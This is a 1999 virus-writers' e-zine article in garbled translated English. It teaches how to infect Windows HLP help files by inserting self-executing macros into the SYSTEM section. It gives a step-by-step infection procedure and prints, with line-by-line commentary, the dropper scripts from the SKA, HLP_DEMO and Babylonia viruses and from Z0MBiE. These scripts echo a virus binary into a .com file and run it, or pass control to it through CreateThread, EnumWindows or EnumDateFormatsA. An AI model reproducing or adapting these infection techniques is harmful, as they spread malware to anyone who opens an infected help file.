HLP

In this clause I shall tell about infection HLP of files. Infection HLP of files Was used in a virus SKA, HLP_DEMO, Babylonia and I have decided to describe this method infected detailed.

The HLP-files can comprise the subroutines written on special Script-language (macros). Used in HLP-script language allows to create on Disk files and to start them on performance. The data script automatically are carried out handler of HLP-files (utility WinHelp) at their opening. In HLP files is divided on some section, us will be interesting only SYSTEM The section in which is possible will to write down the virus. Scripts in HLP files are coded and are packed not complex(difficult) LZ77 by algorithm.
Arrangement of the catalogue of pages (section) first byte of heading - 2Fh this heading to us is not so necessary but on displacement 37h Concerning him(it) we find catalogue. So us will interesting section SYSTEM in which are written down large in the information Structure hlp of a file, language using in operational system and icon and
everyone shit used in hlp files.

[ Infection ]

To infect hlp files two ways first which are possible was used in SKA a virus and the second method which was used HLP.DEMO. The first method more approaches
for DOS of viruses and second for Win32 of platforms. Below I shall bring examples and I shall describe them. So stage by stage that we should make to infect HLP files.

1. Read begin of HLP-dir
2. Find "|SYSTEM" string
3. Read SYSTEM macros
4. Check hlp file already infected?
5. Generate our macros
6. Correct SYSTEM lenght
7. Write scriptmacro header+our scriptmacro in the end of module
8. Rewrite SYSTEM section
9. Write & correct hlp_header
10. Create & write on SYSTEM macros virus dropper on eof
11. Write hlp_dir with correct "SYSTEM" macros


[ Virus Script - Macro Dropper ]

So most important detail hlp of a virus it virus script (dropper), having read
the description hlp of a format and it is a little about hlp macros I shall tell
and I shall describe with what dropper was used in SKA, HLP_DEMO, Babylonia
viruses.

And so an example virus script SKA:

IF(NOT(FE(`C:\\NTLDR.')),`RR("KERNEL32","Sleep","U")')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\\?????.COM",0)')
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')
IF(NOT(FE(`C:\\NTLDR.')),`EF(`C:\\\\CFBEY.COM',qchPath,0)')

And now I shall describe under the order work it script from a virus SKA:

The virus Win95. SK causes command.com and with the help of a team echo and creates a file with a copy of a virus, which then starts. The name of a file and his(its) polymorphic contents gets out casually at infection next HLP it is necessary in hlp of infections. Lacks of this method of that that the window command.com and it is caused to become visible for the user.

IF(NOT(FE(`C:\\NTLDR.'))
In this procedure script checks if to system of a file C:\NTLDR (loader WindowsNT), it is necessary that a virus Was not started in WinNT.

`RR("KERNEL32","Sleep","U")'
Imports function Sleep from kernel32.dll with parameter unsigned long int.

IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',",'"/CECHO ?????????? >C:\\\\?????.COM",0)')
It is function starts command.com and copies the virus in ????? .com
where ?????.com - this generation name
?????????? - virus binary

IF(NOT(FE(`C:\\NTLDR.')),`EF(`C:\\\\?????.COM',qchPath,0)')
It is function starts????? .com, qchPath a complete way to an open HLP-file

And so an example virus script HLP_DEMO:

RR(`uSeR32.dll',`MessageBoxA',`USSU')
MessageBoxA(0,`Trying to infect',`HLP.Demo',0)
RR(`kERnEL32.dLL',`EnumDateFormatsA',`SUU')
EnumDateFormatsA(` ',2048,2)
MessageBoxA(0,`Script comes to end!',`HLP.Demo',0)

And now I shall describe work it script from a virus HLP_DEMO:
It script more approaches for viruses under windoze platform, and lacks of this method is not present, as it seems.

RR(`uSeR32.dll',`MessageBoxA',`USSU')
Imports function MessageBoxA from kernel32.dll with parameters.

MessageBoxA(0,`Trying to infect',`HLP.Demo',0)
We give out the message

RR(`kERnEL32.dLL',`EnumDateFormatsA',`SUU')
Imports function EnumDateFormatsA from kernel32.dll with parameters.

EnumDateFormatsA(` ',2048,2)
We cause this function and the management passes to our virus.

MessageBoxA(0,`Script comes to end!',`HLP.Demo',0)
We give out the message

And so an example virus script Babylonia:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

RR ("USER32.DLL", "EnumWindows", "SU")
"EnumWindows ("?????', 666)

It seems that it is very good and convenient script for HLP of a virus..
RR ("USER32.DLL", "EnumWindows", "SU"))
Imports function EnumWindows from user32.dll with parameters.

"EnumWindows ("?????', 666)
We cause this function c in interesting parameter. (????? - virus binary)

Another virus script by Z0MBiE
~~~~~~~~~~~~~~~~~~~~

RR(`KERNEL32.DLL',`CreateThread',`UUSUUS')
CreateThread (0,0, "????? ', 0,0, "nnnn")

It too very interesting method which has written z0mbie, but according to the author this of a method has some lacks, But it can be used and it`s works.


RR(`KERNEL32.DLL',`CreateThread',`UUSUUS')
Imports function CreateThread from kernel32.dll with parameters.

CreateThread (0,0, "????? ', 0,0, "nnnn")
We cause this function. (????? - virus binary)

Another virus script by Z0MBiE
~~~~~~~~~~~~~~~~~~~~

RR (" KERNEL32. DLL ', "WinExec", "SU")
WinExec(`command.com /c echo????? > sux.com ', 0)
WinExec ("sux.com", 0)
WinExec(`command.com /c del sux.com ', 0)

One more interesting method which too has written z0mbie, it(he) me seems more approaches to multiplatform viruses but also for windoze platform it will work too without the special problems.

RR (" KERNEL32. DLL ', "WinExec", "SU")
Imports function WinExec from kernel32.dll with parameters.

WinExec(`command.com /c echo ????? > sux.com ', 0)
Starts command.com with the help WinExec and copies the virus in sux.com
????? - virus binary

WinExec ("sux.com", 0)
Starts sux.com with the help WinExec

WinExec(`command.com /c del sux.com ', 0)
Let's remove a file sux.com

So infection HLP of files it is possible to consider(count) very simply to write, it is necessary only to write on better(better) polyengine good for hlp Infections. I not became describe all teams which can to be used in HLP files but in the following release of a e-zine. I plan to describe and to write hlp infection.

ULTRAS[MATRiX]

12/2/99